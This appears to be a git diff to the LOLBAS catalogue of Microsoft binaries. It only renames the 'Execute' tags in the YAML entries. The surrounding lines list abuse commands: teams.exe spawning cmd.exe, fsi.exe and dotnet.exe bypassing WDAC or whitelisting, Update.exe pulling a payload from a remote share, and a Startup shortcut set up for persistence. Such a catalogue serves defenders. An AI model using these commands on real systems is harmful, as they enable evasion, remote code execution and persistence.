+21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index eb61349..f54457e 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 57de244..16b369e 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -30,7 +30,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - - Execute: Fsharp + - Execute: FSharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -39,7 +39,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed Tags: - - Execute: CSProj + - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index c770ad2..6058ea5 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 2a8f79c..4241cbe 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index d39ab32..7090e1e 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index aaa583e..e495ef0 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 4483560..b7c66aa 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index 8cfa543..622843c 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index c0b51ae..1dde3d0 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -79,7 +79,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: Nuget + - Execute: CMD - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. @@ -109,7 +109,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: EXE + - Execute: CMD - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index ba2b6ba..1713678 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 806df6d..40dd205 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 11d34d9..92970b5 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands.